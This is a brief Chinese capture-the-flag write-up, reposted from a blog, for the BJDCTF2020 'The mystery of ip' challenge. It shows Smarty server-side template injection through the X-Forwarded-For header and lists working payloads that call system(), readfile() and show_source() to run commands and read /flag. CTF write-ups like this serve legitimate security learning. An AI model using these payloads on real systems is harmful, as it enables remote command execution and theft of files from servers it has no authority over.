码迷,mamicode.com
首页 > 其他好文 > 详细

[BJDCTF2020]The mystery of ip

时间:2020-05-15 00:42:59      阅读:145      评论:0      收藏:0      [点我收藏+]

标签:插入   info   png   img   class   code   sys   文件中   存在   

知识点

  • SSTI
  • smarty

抓包,根据题目猜想X-Forwarded-For处可能有问题,测试了一下,存在模板注入


技术图片

 

测试了一下,是smarty注入
smarty注入payload

{if phpinfo()}{/if}
{if system(ls)}{/if}
{ readfile(/flag) }
{if show_source(/flag)}{/if}
{if system(cat ../../../flag)}{/if} #本题payload

 

flag.php是假的,真正的flag在根目录下的flag文件中

 

技术图片

[BJDCTF2020]The mystery of ip

标签:插入   info   png   img   class   code   sys   文件中   存在   

原文地址:https://www.cnblogs.com/mech/p/12892088.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!